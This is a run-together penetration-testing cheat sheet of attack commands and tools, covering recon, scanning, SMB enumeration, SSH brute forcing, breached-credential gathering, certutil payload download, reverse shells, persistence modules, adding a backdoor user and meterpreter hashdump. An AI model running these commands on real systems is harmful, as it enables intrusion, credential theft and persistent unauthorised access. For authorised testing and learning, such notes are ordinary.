Email addresses
- https://hunter.io to find email addresses and email patterns.
- Gather breached credentials with
breach-parse
Subdomains
assetfindertheharvesteris a tool in kali that can find emails, subdomains, IP addressessublist3rcan enumerate website subdomainsapt install sublist3r
- https://crt.sh uses certificates to enumerate subdomains
amassyet another subdomain lister
After finding subdomains, tomnomnom httpprobe can take a list and show what sites are running.
Find what a website is built with:
- https://builtwith.com
wappalyzerbrowser pluginwhatwebyet another website technology enumerator
Intercept web traffic using:
Burp SuiteFoxy Proxy
Don't forget Google dorking or social media sites.
Machines and Ports
Consider using masscan to enumerate all the ports -- it's faster than nmap.
Then, use nmap -sV <target> for banner-grabbing.
netdiscoverto find machinesnmap -T4 -p- -Ato find open portsnmap -sU -T4 -p <host>
Load up IP addresses and look for default or error pages
nikto
Default pages, error pages, or information about the underlying architecture can be filed as information disclosure
Tools if smb is discovered after nmap scan:
msfconsolesearch smb- try for example:use auxiliar/scanner/smb/smb_version
smbclienttry to connect to it and try the individual sharenames in the server path.smbclient -L \\\\10.10.10.4\\$ADMINleading slashes escape in linux.
Search for exploits on the services/ports and versions that were found:
Other scanning tools:
masscan -p1-65535 --rate 1000 <ip addr>this tool scans the whole internet, make sure to specify ip so that you're not hitting disallowed serversmsf5 > search portscanuse scanning options from metasploit- https://www.tenable.com/downloads/nessus
Try to obtain shell
- Reverse shells
- most common shell exploit
- Bind shells
- useful if need to get around LHOST NAT or firewalls
Know the difference between staged and non-staged payloads. There can be identical attack patterns but the staging of the payload causes one way to work and one way to fail. For example, if one metasploit exploit fails to complete, try to search for other payloads. set payload linux/x86 (then tab autocomplete to enumerate options). Try a single non-staged payload or the opposite.
Brute force tools:
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<ip>:22 -t 4 -Vattempt root login on target IPmsf5 > use auxiliary/scanner/ssh/ssh_login
Password Spraying & Credential Stuffing
- just try to use the creds found in information gathering to login to anything
pitchforkfeature in Burp SuiteIntrudertab
Found a default web page and want to find viable paths?
dirbustergobuster
Payloads other than msf:
msfvenom- for example, can create a reverse shell tomcat war file
Download file to windows or linux:
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exepython -m pyftpdlib 21on host to start ftp serverpython -m SimpleHTTPServer 80from lhost and get from rhost
Escalate user:
linEnumLinuxPrivChecker
Find vulns on windows while logged in
rasta mouse/sherlock- GDSSecurity
Windows-Exploit-Suggester
Persistence scripts
run persistence -hexploit/windows/local/persistenceexploit/windows/local/registry_persistence
Scheduled Tasks
run schedulemerun schtaskabuse
Add a User
net user hacker password123 /add
meterpreter > getuid
- NT AUTHORITY\SYSTEM - highest user on windows
meterpreter > sysinfo
- Get information on system, see if it matches earlier scans
meterpreter > help
- find all the commands you can do while connected to a system with a meterpreter shell
meterpreter > hashdump
- try to crack the passwords, or try to "pass the hash"
Not escaleted, but got a meterpreter shell:
meterpreter > background
msf5 > search suggester
use the suggester to find possible root escalation tactics